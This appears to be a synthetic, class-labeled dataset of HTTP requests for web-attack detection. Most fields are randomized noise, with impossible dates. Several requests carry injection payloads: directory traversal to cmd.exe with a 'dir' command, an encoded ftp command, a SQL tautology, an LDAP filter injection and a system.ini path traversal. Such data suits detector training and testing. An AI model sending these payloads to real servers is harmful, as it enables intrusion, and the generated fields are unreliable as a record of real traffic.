Via: 7.8 www.meph8ro.gif, HTTP/4.4 8.109.142.89, 1.0 166.226.245.116
Transfer-Encoding: gzip
Upgrade: mee/7.7, coi/1.5, plalfl/9.5, 1ocfo/7.9, tsoiin/2.5
Warning: 573 90.107.83.182:9973 "lttoC2rteccnokatt" "Tue, 21 Apr 09 10:53:32 CET"
X-Forwarded-For: 194.171.248.197
X-Serial-Number: 550681
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11417
Start - Id: 43244
class: OsCommanding
GET /Yws0nnh4a/enbpni3nI/oTo9/kkyrdoioee9Aa9docr6/Lftp/peApa4jedwer/o6N.php?s4sJbTl1H=gY2&cBSjdEP60a09=lpimgah&btis=66894143&cXfromrLi=%3EftT+b%3Cte%3DLSfgo++ndD&9pkI@=evsyS4QA2Cz_&tqXD=%5Cn++uftp+-p+++www.ertr.com+++++%2Finre%2Fesentost%2Frisi%2Faserri%2Fan%2Fas&irtXnntwxdqypet=ceirudx0sh8s&t4nsniw9s1intm=46&pix=ehlsaccepth&d4daNaarsgohec=e1sp&od=560794156&pcd=documentbl%27%5D9%2FhHhD HTTP/1.1
Host: 174.47.145.31
Connection: ieowee
Accept: */*
Accept-Charset: euc-kr;q=0.3, iso-8859-1;q=0.5, isiri-3342;q=0.2, windows-874
Accept-Encoding: deflate, gzip, identity, compress;q=0.6
Accept-Language: e1wgnpT-nt;q=0.5, oLr-emlhtem, ie3-g;q=0.6, 6-noxaslt;q=0.1
Cache-Control: max-age=2357
Client-ip: 92.41.242.45
Cookie: n7cnrytn=chwelsee;ar0j=849141;Tiaepnpxpeeei6e=o9wedqopabakucywon;vdmwahMde=eErw;5.pv1=bair
Cookie2: $Version="8"
Date: Thu, 19 Apr 07 15:20:13 CET
ETag: "C3D.70knu_pQ_crGa"
Expect: 100-continue
From: w5itei@2re1ofAi.st
If-Modified-Since: Thu, 02 Aug 07 16:28:04 GMT
If-Unmodified-Since: Fri, 21 Dec 07 07:05:06 GMT
If-Match: *
If-None-Match: "KNpOLxGzqwDX@7YWDblS"
If-Range: "89KxU-9PCmJwFsBC1z4"
Max-Forwards: 04
MIME-Version: 6.4
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Basic bmlyb3BqOml5b3M=
Range: 6235-,3-
Referer: /1Stpn.cgi
TE: trailers,chunked;q=0.6,trailers
Trailer: If-None-Match
User-Agent: s7WxTn09HT http://www.5oshni4.gov
UA-CPU: 68000
UA-Disp: 9170,0027,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 115x099
Via: FTP/6.0 225.25.182.234
Transfer-Encoding: OuaE; cplrc0sl=fdohc
Upgrade: nedg/4.6, yodj/9.6
Warning: 865 www.tCxceo.shtml "dydtrSr7Wtth" "Fri, 09 Jul 04 12:15:54 GMT"
X-Forwarded-For: 136.143.222.59
X-Serial-Number: 855673274232810386
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43244
Start - Id: 28509
class: Valid
GET /nzvrpepSiui/ihictgh1giz7lnleee9n.js?iuHeitRe=yUBQ4J-BCP&ec0emb=uoct&HsnmrPAh4pmikoi=htk%3B&pea=038098 HTTP/1.0
Host: 134.14.186.190:80
Connection: close
Accept: text/html, text/plain, video/*;q=0.8
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.0
Accept-Language: qEayh-oenCt, xo0-tzn
Cache-Control: max-stale
Client-ip: 32.238.214.238
Cookie: umo5qwqtwctoifg=oi;bs=9242252;mrt2Nzw2eT=IAlabcE;8a7J4=1324;etauq91=cbz-lU@Y;eemoKr9w=autoexecdorscript
Cookie2: $Version="0"
Date: Sat, 17 Mar 07 24:42:42 UTC
ETag: "yppLMFwBOO_V8oanKDq"
Expect: it3AnCte
From: Hiedyo@ds6eekiny.org
If-Modified-Since: Tue, 08 Jul 08 18:27:07 UTC
If-Unmodified-Since: Sat, 09 Jul 05 17:35:25 UTC
If-Match: "vdkP44A6BMHC.376"
If-None-Match: "xhPImJ4Hh0yBuZhWu"
If-Range: Sat, 09 Sep 06 24:32:13 CET
Max-Forwards: 8327
MIME-Version: 6.6
Pragma: ifoiA='iEy'
Proxy-Authorization: Digest uri=http://Hsay.st/trannnt/atcu/nxsempc/fmeipts7/enyoea.bin
Authorization: eipuTg 1streav=oteult
Range: 7-93,534-66746
Referer: http://deeRwf.net/u3nrroe1/hna5c5.sh
TE: chunked;q=0.8,trailers,chunked
Trailer: If-Unmodified-Since
User-Agent: Mozilla/6.1 (Machintosh; U; PPC Mac OS X 1.8; ow-N8; rv:5.8.1) Gecko/76817238
UA-CPU: PowerPC
UA-Disp: 3600,6698,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 116x668
Via: Esulto/7.7 www.onbvP.htm
Transfer-Encoding: deflate
Upgrade: t5rg/1.6
Warning: 758 139.134.163.207 "9ssartsdi" 
X-Forwarded-For: 36.15.26.228
X-Serial-Number: 9412157070981544486
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28509
Start - Id: 23090
class: Valid
GET /qnye.bin? HTTP/1.0
Host: 7.207.104.138
Connection: pct3efi
Accept: video/*, text/html;q=0.4
Accept-Charset: x-mac-japanese, x-mac-ce
Accept-Encoding: *
Accept-Language: neEtEr-oi9sast;q=0.7
Cache-Control: max-stale
Client-ip: 60.218.67.248
Cookie: Y@xp_rjqqf=t-Towherecu:l;miqFw=ni@
Cookie2: $Version="980"
Date: Sat, 13 Nov 04 08:46:25 CET
ETag: W/"6jU3qjmRU9Gu.70"
Expect: eemc3aio=1edSoen;iehc0lqi
From: Hocan@osthutarg1.biz
If-Modified-Since: Wed, 19 Sep 07 12:49:01 UTC
If-Unmodified-Since: Tue, 09 Aug 05 22:58:02 CET
If-Match: "GfVrT7ptUE-o_gcOE2."
If-None-Match: *
If-Range: Sun, 06 Jan 08 17:29:34 UTC
Max-Forwards: 728
MIME-Version: 5.9
Pragma: tte8uak='opRnnee'
Proxy-Authorization: Digest nonce
Authorization: Basic Z0NoNmFoZGw6bnRtem5kbFE=
Range: 411788-,-919885,19-6
Referer: /oP6aj.asmx
TE: gzip;q=0.7,gzip;q=0.3,chunked;q=0.1
Trailer: Authorization
User-Agent: Mozilla/7.3 (Windows; U; Windows NT 6.3; ei-rs; rv:4.3.0) Gecko/63946651
UA-CPU: Sparc
UA-Disp: 784,1462,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 0764x660
Via: HTTP/5.2 59.17.160.8, HTTP/2.2 www.na9oltr.gif:06794
Transfer-Encoding: compress
Upgrade: prlHv/9.3, doutme/0.7, 0ng/5.1, sapxte/1.0, gee/6.5
Warning: 324 www.ri7acH.jpeg "erWNaaa6tn" 
X-Forwarded-For: 95.86.251.48
X-Serial-Number: 18684889581671575
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23090
Start - Id: 34764
class: Valid
POST /9tovth/rEf2w-Rzw.n0sPn/iMtMmrea/rBtlCh/dxTIonpenTcwlDoItan/hOV/UKid8boot.iniQ1Ry/qsenreq1r/sM@8Gsl@JA1_flGE.CwM.jsp? HTTP/1.0
Content-Length: 160
Content-Language: qsmaf,eXfi,sC
Content-Encoding: deflate
Content-Location: http://www.Ian3.org/9nms7oL/t3c2i/edatj/mlAba.asp
Content-MD5: dG1sYVJzNzRsYnNzYUFmbg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 30 Mar 04 17:50:22 CET
Last-Modified: Sat, 06 Feb 10 01:57:15 GMT
Host: 99.137.87.75
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: identity;q=0.2
Accept-Language: aoli-eve;q=0.2, oibms-fdll0t, wssrt-j4rsmu;q=0.4, niqt9S-r, Nuery-bmles;q=0.4
Cache-Control: no-transform
Client-ip: 38.141.39.26
Cookie: Sinuwindow.openkS=oLn<|;eBc9VKhUEv=/i;b7EyRe2oleewoij=erjhi
Cookie2: $Version="4"
Date: Sun, 12 Jun 05 02:12:24 GMT
ETag: W/"kGz@P6WXOQLXU8KP"
Expect: rnuaet
From: iaoc1brO@mxbt8wsL.be
If-Modified-Since: Fri, 30 Dec 05 02:46:39 CET
If-Unmodified-Since: Tue, 16 Mar 04 03:39:55 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 05 Feb 04 15:05:43 GMT
Max-Forwards: 3734
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: wIfEle enFonbe=shigcnoo
Range: 019-
Referer: /iqrpo.doc
TE: deflate,gzip;q=0.0,deflate;q=0.9
Trailer: If-None-Match
User-Agent: Mozilla/4.1 (Windows; U; WinNT 9.5; jh-2f; rv:9.7.7) Gecko/65772991
UA-CPU: StrongARM
UA-Disp: 456,5311,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 012x6742
Via: FTP/1.4 157.170.137.113, kIrnno/9.3 www.seeec.png, 5.1 www.evn2OetH.shtml:19
Transfer-Encoding: compress
Upgrade: r4ic/7.1, 0fe/0.7
Warning: 123 100.107.127.239 "n5ewoMdyi4" "Fri, 13 Oct 06 14:28:46 GMT"
X-Forwarded-For: 24.228.137.43
X-Serial-Number: 438515700357527
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ihu=neatiE8eEqylnbe&nkEwaGe=now&dsnwfscsi8zeHtt=iOnigdSvbetweendAtr8&cayhItx=|A[id&sn8O8d7ntietsul=H~9eg&egacrrtuciuo8sl=2&ertboso5sqsajeb=g  4&mhou=65882

End - Id: 34764
Start - Id: 31268
class: Valid
GET /RtbBLiujtniawopiC/n_kv3eH58t1rk1ciExSc.jpg? HTTP/1.0
Host: 206.49.183.27
Connection: oeHrz
Accept: application/*;q=0.6, image/*;q=0.5, audio/*;q=0.3
Accept-Charset: *;q=0.2
Accept-Encoding: compress
Accept-Language: *
Cache-Control: 09=etp
Client-ip: 200.93.24.149
Cookie: sPLF3vQNUtNx=ree;eoglttcNtEa=207
Cookie2: $Version="0"
Date: Thu, 23 Jul 09 02:35:28 GMT
ETag: "iZpDt0NHgoX8qTEDjFL"
Expect: qddeh=sdiabmt;loHserrr
From: harutUle@4Tes.com
If-Modified-Since: Mon, 28 May 07 21:35:55 UTC
If-Unmodified-Since: Fri, 25 Jan 08 16:26:56 GMT
If-Match: "erTy3F5LVfcUoiraG_on"
If-None-Match: *
If-Range: Thu, 02 Aug 07 19:14:11 UTC
Max-Forwards: 0
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: Digest response="57BDdf1DBA67734eB88F9d60DBd482BC"
Authorization: l4wi AeDLYae=otoo3HP3
Range: 019-,893-4434
Referer: /slack/gatl.txt
TE: gzip,gzip;q=0.3
Trailer: From
User-Agent: 1ln4y9fEo53auDxnxal
UA-CPU: 68000
UA-Disp: 097,2984,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 3795x126
Via: FTP/2.0 www.rnYoIl.html
Transfer-Encoding: compress
Upgrade: vn4e/1.5, o4t/2.0, qsr1e/6.0, tmD/0.8
Warning: 160 www.s6Dl4nG.js:02 "wyNAeNlmsnn6" 
X-Forwarded-For: 45.216.230.89
X-Serial-Number: 173088240
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31268
Start - Id: 41777
class: SqlInjection
GET /rs9gIne1sEao7citda/uelbsbnh/2hGSnnnn6Weiaps5eoEc.sh?mthsrEL=m9rexecreaccept5l%28%3Daftpwvbscript&tfPp2hyrwh=c0nanrot+%2F3iwiu&eneLLko=http%7E6rmtt&1Fz2yTXYn0L=s.-Ej4&Ya=320&ae=utonsemt&roehneeaO=OrigText%27OR%27utsters%27+++%3D+++%27amih7ilsz%27&ti=ezlspen3taixMzs&96eu2o3hys9da=358&ddsuy0dCwnjt=452425039 HTTP/1.1
Host: www.lmezisl.biz
Connection: diaho
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: gzip;q=0.8, deflate;q=0.7
Accept-Language: *;q=0.0
Cache-Control: min-fresh=39967
Client-ip: 19.38.3.115
Cookie: cnehsnet=eh;Imdiyromuy5db=S;ae=844715;OYiY4OimgzT6gq=8bMC
Cookie2: $Version="0"
Date: Thu, 26 May 05 12:50:33 GMT
ETag: "Sd60XM.NsDcpTEMyeIVx"
Expect: ocoe
From: rhuEDm@qpruheT.de
If-Modified-Since: Mon, 25 Apr 05 05:39:38 CET
If-Unmodified-Since: Thu, 14 Jul 05 14:53:11 GMT
If-Match: "x34Z6qu0mqF6_ZM.Nnx"
If-None-Match: "htHqjJYrd_ILIB38VhcX"
If-Range: *
Max-Forwards: 886
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: Digest cnonce="ayrepssY"
Authorization: Digest realm
Range: 4745-5836
Referer: /hsir/2lmfn/66m1Dtp/e4crre/8siuhdW.gz
TE: trailers,trailers
Trailer: Upgrade
User-Agent: T5tg (cBv-Tzd; e.ptH62u71; oPjtiy; mDoWbQX; smaTxBBXuQ)
UA-CPU: x86
UA-Disp: 079,3300,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 5624x146
Via: HTTP/5.4 www.eXara.jpg, suc/1.2 www.ehed3r.js:55
Transfer-Encoding: deflate
Upgrade: ped/5.7, utiwa/4.3, NDinca/1.6, HleG/8.5, 6ot/6.6
Warning: 033 232.84.135.234 "we7ecsEbGih0" 
X-Forwarded-For: 126.254.87.29
X-Serial-Number: 79451842006720281
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41777
Start - Id: 38774
class: LdapInjection
GET /4logeyxUBCUL/w9dFlUlnotOSb/ug0Oarxiyuiae8niifMx/6V3W2mOexecNPub/oQ-x9YE.wpsp78kZ_.exe?tnacaoPEyooldn=iener7oie0aduo&egeeCiac=9&cof-G0oJrlike=u%5CnnnI%2F6Apaee&ua=20&ekatazasrtt=js%29%28++++%7C++++%282dkor%3D*%29&eadtoHaptYFg=eaese1sbEhre&lsx8hC=219031294&kcardcf8eq=kdcrabnxlrrBoadmin&b5eptXa8i=Beeiweryce&mtesiFc1eWwat=rheayopefeztM&0yAisieAatt=euND HTTP/1.1
Host: 3.116.153.6
Connection: keep-alive
Accept: application/*, image/jpeg
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: i4-msnafrak, odshbLo-yei, 0so-ope9, tt-qi;q=0.8, vgr-znsn1;q=0.1
Cache-Control: only-if-cached
Client-ip: 103.114.5.31
Cookie: gelBcUawttio=lbUer7shutdownrzsli;wlttginlnr=8705974;seoEafy5oachk4r=c7C@saK;otj=nei
Cookie2: $Version="379"
Date: Thu, 12 Jun 08 13:25:29 GMT
ETag: W/"veWm4Di8HikI9CrFgJ"
Expect: 100-continue
From: eedz@idneeachi.org
If-Modified-Since: Sat, 24 Apr 04 12:12:40 GMT
If-Unmodified-Since: Wed, 21 Oct 09 22:55:20 UTC
If-Match: *
If-None-Match: "@-G7TJ.Pir-I_hnKbEs"
If-Range: *
Max-Forwards: 268
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: msqj1 teTt=oUahvo
Authorization: Digest realm
Range: 7-
Referer: /paeeehqn/Cnte/7ses/teo4o.bin
TE: gzip
Trailer: Trailer
User-Agent: dk2nesltic
UA-CPU: Sparc
UA-Disp: 1821,609,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 343x5234
Via: 8.1 www.ddenNs.png, 8.2 49.250.97.224
Transfer-Encoding: ciers
Upgrade: uheEfl/5.8, bsp/0.2, slh/3.9, tfor/3.1, iAr/7.5
Warning: 757 214.136.112.103 "ie6uit3rtiiPirtc" "Mon, 03 Oct 05 02:38:07 UTC"
X-Forwarded-For: 253.134.222.74
X-Serial-Number: 323337935267147
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 38774
Start - Id: 11004
class: Valid
GET /9veNcaennhoooznanjt/flogHssT/tcmSl77WUcpOve@Xc/cor/neooEofisfEtf/egi61r8.cfm? HTTP/1.1
Host: 72.27.66.65
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: no-cache
Client-ip: 192.95.131.247
Cookie: a5=ttcnfeKeEahsystemsHpya
Cookie2: $Version="9"
Date: Tue, 22 Mar 05 16:31:35 UTC
ETag: "iQfD58USLgrSmKWyKC"
Expect: aeeo7Dei=wsbejae;nipawec
From: Oimrip@itut.fr
If-Modified-Since: Fri, 13 Nov 09 16:25:36 CET
If-Unmodified-Since: Sun, 17 Jan 10 04:42:52 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 13 Nov 04 23:44:00 GMT
Max-Forwards: 0359
MIME-Version: 9.8
Pragma: atsoss='Mizeaaa'
Proxy-Authorization: ayTqd ipelosnh=nhw7hz
Authorization: Basic Tm5tMHNlb2I6c3doc3RpaQ==
Range: 68-612
Referer: /ptdl/lrialES/drrrRd/aOmw/eeutgo.shtml
TE: chunked;q=0.2,chunked,gzip;q=0.2
Trailer: Date
User-Agent: rmHscgn/9.0
UA-CPU: Sparc
UA-Disp: 618,722,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 124x705
Via: 6.5 186.114.166.165, FTP/2.6 186.117.224.63
Transfer-Encoding: deflate
Upgrade: Enfrte/3.8, el1/4.8, i8r/0.7, 7AJjip/7.1
Warning: 404 55.233.111.251 "hwzpimntn" 
X-Forwarded-For: 187.124.141.113
X-Serial-Number: 109708230731
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11004
Start - Id: 44118
class: OsCommanding
GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.seIieo.st:9930
Connection: close
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=75
Client-ip: 178.250.250.231
Cookie: ieArhRi1dxew=7Iem;ensa3oqTphy=aevalmt;0neRnNAea;otpaTewcoradsni=6prfttnsts)iwgincluden3e;ftdacuuacn=d;zb5j;erMdebQpr5tlRsr=422201547
Cookie2: $Version="896"
Date: Sun, 13 Jan 08 08:34:49 CET
ETag: "6ppIn19@NaQSoJPiB"
Expect: 100-continue
From: edi6llee@iwIc9.ch
If-Modified-Since: Wed, 31 Jan 07 20:22:15 GMT
If-Unmodified-Since: Sun, 18 Jan 09 09:25:20 CET
If-Match: "w8jIW-yi4JTTJv17."
If-None-Match: "v9taLmA2KHvsnCWYhh7H"
If-Range: Sat, 14 Apr 07 01:02:35 GMT
Max-Forwards: 66
MIME-Version: 5.1
Pragma: hi='eciendp'
Proxy-Authorization: 2oson 6aanekr=etytqel
Authorization: NTLM Y3RzYnN2Y2VubG4xZTBjZG56ZW91aWxlV3RhbnlycGZldA==
Range: 6-5561
Referer: http://ytsi.it/tWin/ann8.php
TE: trailers,gzip
Trailer: Date
User-Agent: aexE/5.5.5.1
UA-CPU: x86
UA-Disp: 224,424,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 1501x189
Via: 9.7 www.dyo3eslN.png, FTP/0.2 www.aica.tiff, 5.8 www.rsind045.html:514
Transfer-Encoding: compress
Upgrade: fnueh/3.8, a9n2i9/3.6, nbit/5.9, ydtTto/6.5, ryee5/2.9
Warning: 038 www.Iwehs8.jpg "pwentl6I1attqrfteiY" "Sat, 05 Jan 08 22:01:37 UTC"
X-Forwarded-For: 175.18.32.237
X-Serial-Number: 008751
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44118
Start - Id: 19456
class: Valid
GET /rj2fZhTaGZak/0aswt/t-LDFp3PVe/tjf_QseHaFGUJqHE/dX8op2A36F4l.jpeg?aipxOmlsaueo4na=iCUDg_&tzwoiweo4sehlfa=pe6g HTTP/1.0
Host: www.seeAt.it:5
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: max-age=473
Client-ip: 132.242.223.147
Cookie: ft=1
Cookie2: $Version="7"
Date: Mon, 07 Dec 09 13:04:16 GMT
ETag: W/"-LPnKoFU5rJWK-a5Y."
Expect: eDioceT
From: iAorlael@65tgUr6o.st
If-Modified-Since: Tue, 28 Aug 07 20:54:01 CET
If-Unmodified-Since: Sun, 25 Apr 04 04:29:21 GMT
If-Match: "lD-IQ3BKRgQpvOKCMKc"
If-None-Match: "d4vsJZX3F6hSZHga7xJ"
If-Range: Sat, 28 Jul 07 15:16:34 GMT
Max-Forwards: 31
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: NTLM dHVUckVoYWVlNnRvYWFubjI3N2Rlc25hbHdveWdkb0FzaThyRWloT2ZrSXlpaQ==
Authorization: Digest opaque="roeoyii"
Range: 8819-,9639-,-4094
Referer: http://yiIzstid.it/G6need1r/eItq6e/x5ie/lTvao.gif
TE: trailers
Trailer: Accept
User-Agent: Mozilla/4.9 (compatible; Konqueror/4.9; SunOS sun4u; tungDN; Sttrvsnlb)
UA-CPU: PowerPC
UA-Disp: 915,682,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 6480x436
Via: FTP/7.1 183.106.63.141, 8.4 217.43.227.177
Transfer-Encoding: gzip
Upgrade: loo6/9.1, aFis/1.8, qottf/0.1
Warning: 889 www.tpb2d.html "1p2mfhiat" 
X-Forwarded-For: 229.29.101.243
X-Serial-Number: 219251362727568
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 19456
Start - Id: 11714
class: Valid
GET /bash3ioti/665zbIenQg/l4630vQ3f9-2KsSP/ebriinr5bg9v/uafsnmth07Lttasth/lcZ62kRKrB26BmWPd-/ixsyApe.exe?frs8=rEec%27sp1n&8iaeWNiseyto=celni%3Es1taeoa&Eaatc=yee%3Bh&nEeolee2ec9wxa=70&ysitzu0iQ=hoh7at HTTP/1.1
Host: www.saasxo.be:29429
Connection: close
Accept: audio/basic;q=0.2
Accept-Charset: gb2312, iso-10646-ucs-2;q=0.4, windows-1254;q=0.2, x-mac-chinesesimp;q=0.6, iso-8859-3;q=0.2
Accept-Encoding: identity;q=0.4, identity;q=0.0
Accept-Language: *
Cache-Control: max-stale=92624
Client-ip: 228.241.203.171
Cookie: cIbatpeta9ef=maedotrciuidtize5;Heyaretzyi1hopi=46;rTtuneuQ8y=20;aPstye=240026;oao2t=oginfneincludeiehrtn;fese8rMido=nM7RZk.Zw
Cookie2: $Version="63"
Date: Tue, 30 May 06 04:43:52 GMT
ETag: "XPJwXZdQxVbMljj49"
Expect: 100-continue
From: lAuala@v9ti4o.be
If-Modified-Since: Mon, 08 May 06 19:11:58 UTC
If-Unmodified-Since: Thu, 26 Jan 06 02:11:50 UTC
If-Match: "ola3YAQP87v5UTI1X_"
If-None-Match: "8eMJKGgd91kim.tktCrc"
If-Range: Mon, 19 Jan 04 19:58:07 CET
Max-Forwards: 743
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Digest uri=http://iyoaifI.uk/iwiidi/dstccor/hJfiiG/uAtcheam/Lnrl.doc
Authorization: NTLM cnloc21lZGs4ZWN0MExyVGVvdW4zd2FodHlhbjB5dXRlaW5lc2Q3ZWlvcw==
Range: -63,010806-6
Referer: http://w4erooa9.org/ndnlo/aceLeeon.msf
TE: trailers,trailers,trailers
Trailer: Accept
User-Agent: Mozilla/8.0 (compatible; Konqueror/5.4; SunOS sun4u; he12h; RciinNweoh; 6hse)
UA-CPU: x86
UA-Disp: 627,463,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 8474x4418
Via: FTP/9.5 www.tredet.jpeg, HTTP/8.4 32.80.242.33, HTTP/2.1 www.tcuehnuw.gif
Transfer-Encoding: gzip
Upgrade: tg2r/9.0, fere/5.1, Samd/0.1, iasFl/4.6
Warning: 508 www.Wowebu.shtml "eitda3tdi4a9" "Wed, 29 Mar 06 15:01:52 GMT"
X-Forwarded-For: 129.43.76.8
X-Serial-Number: 089001831112
----: ----------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 11714
Start - Id: 45953
class: PathTransversal
GET /fm6hqwahf7ecesccteg/umsb5t/eO5wpi6v5EoD1/lNrrmiHseergfirmruo/11/peutiHdsa/umg_flNzA/yaRc@0q/7dnane/q0cX1Fbys5c.cgi?ltyaEvrteys=De6oq%27inrtdadaq+rkE&neuepexYkrcfgn=ehZ96d&pltoRl=csktvhoIgo&ricl=r%3Dfona&rhuphvy=2394182&eNy9selectTv=r9FrZpa59XIH&tlcawoeihja=..%5C..%5C..%5C..%5C..%5C..%5CWINNT%5Csystem.ini&0s=50074 HTTP/1.1
Host: www.ilO1De.com
Connection: 4ttshAzk
Accept: */*;q=0.0
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: elAnwell-nar8Tao;q=0.8, 7Ceb-Df, ngtin-mecty;q=0.3, 3t5i2l-onr, l-nrlem
Cache-Control: no-cache
Client-ip: 48.114.132.12
Cookie: 2Rxurfta=904355;SUHTiJ@=O;mZglogusrf8x= e6;ej3lwei1in=r5edalIiv7;nenIemestD=ss)
Cookie2: $Version="235"
Date: Wed, 07 Jun 06 19:52:39 CET
ETag: W/"Jy54JyeN5DvDzJBlnR"
Expect: e8ch
From: cpanabu8@leeWhlh.biz
If-Modified-Since: Wed, 19 Apr 06 09:42:23 CET
If-Unmodified-Since: Sun, 03 Feb 08 02:15:35 GMT
If-Match: "mReIXtk8AgAk2_n"
If-None-Match: *
If-Range: Fri, 30 Apr 10 21:46:22 GMT
Max-Forwards: 4
MIME-Version: 5.8
Pragma: lots=Ehtegor
Proxy-Authorization: atacrJ nOIndN=dosn6sfe
Authorization: Basic d2ZvaHRrczplR25scm9lcw==
Referer: /ieniGaii/mrixarjw.asp
TE: deflate;q=0.7,trailers,deflate
Trailer: Accept
User-Agent: rMshIde (hKGvX-1Ojm; mgvlpDQr; gAgKQ4H2; q-Kf2VbpC)
UA-CPU: x86
UA-Disp: 3135,8994,8
UA-OS: FreeBSD
Via: FTP/1.9 238.168.119.29, tnl/6.4 214.16.236.249:2
Transfer-Encoding: sinlt; m7lee5RI=cEni
Upgrade: ihmRi/3.1, csAMi/2.6, ruqry/0.0, hejq/9.2
Warning: 607 www.otrO6o.css "taqtatn4rh" 
X-Forwarded-For: 79.119.72.4
X-Serial-Number: 6933322511
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45953
Start - Id: 33255
class: Valid
POST /zJ/iuHPd/ApFgZNGknE/tos/7nH7QRgo-c1ragWByT5/nslenqspotan.cgi? HTTP/1.0
Content-Length: 230
Content-Language: eiir79h,8,shownsnt
Content-Encoding: deflate
Content-Location: http://hirl.fr/mEein7/travysp.msf
Content-MD5: dGthcG5mbm9kbm5SbXR0dw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 07 May 06 22:07:38 CET
Last-Modified: Thu, 24 Aug 06 07:49:28 GMT
Host: 229.142.171.43
Connection: close
Accept: audio/*
Accept-Charset: *;q=0.8
Accept-Encoding: identity;q=0.9, deflate, identity
Accept-Language: daoea-jcgifo86;q=0.7, stseh-eeZlV
Cache-Control: no-store
Client-ip: 86.2.91.89
Cookie: oeti='3el;slat2=821mjf6Nv;tsmrte=0898990;Uulhperlrr=59
Cookie2: $Version="4"
Date: Wed, 24 Jan 07 12:31:18 UTC
ETag: W/"X3Mh@UX2w-5Q_Th"
Expect: 100-continue
From: fhleens@leny2Irsni.it
If-Modified-Since: Tue, 07 Dec 04 18:53:38 UTC
If-Unmodified-Since: Fri, 18 Mar 05 20:46:50 UTC
If-Match: *
If-None-Match: "fWlBD.bsnHhHMtDJf-0"
If-Range: Sun, 31 Oct 04 18:32:43 GMT
Max-Forwards: 043
MIME-Version: 2.7
Pragma: kjha=tar
Proxy-Authorization: NTLM c1BoWW1uMmxyZWx0Y2lvYXJvZWhJeHBqMGNpZ2U2ZmFvc2VMYndo
Authorization: Basic RWREaWFvbnk6aGR6cG5tbg==
Range: 79-128388,8-15392,-0
Referer: http://aceemsr.com/oOfe/i55hpir/bbgasaE/eaEfwl.cgi
TE: chunked;q=0.3,trailers,trailers
Trailer: TE
User-Agent: a4uhrn/9.7.5
UA-CPU: 68000
UA-Disp: 088,074,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 8624x050
Via: 6.2 www.aqynou.shtml
Transfer-Encoding: deflate
Upgrade: e1Tt3/7.1
Warning: 005 151.23.15.163 "mdOdit6jnia" "Fri, 27 Jul 07 23:21:34 UTC"
X-Forwarded-For: 220.33.220.61
X-Serial-Number: 3445035771495
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

k-Cohhtacces=tekHe0b6G7y&aqiseedehw=ewe0fnhm4m&tmebs36mESnxhpa=06&ersDqrtq1hTe=oOLL04e@st&1naesN8eRi7srvu=|adminnt&Z8BUT6gZl=6&ecU8rxoA0nwn=dnfexecEaand&xctkaegn=nxAsaftnopoz4mhome$7sht&0noeanloehsnre=rxzYb5vrIBQ&nndai1=7209

End - Id: 33255
Start - Id: 10992
class: Valid
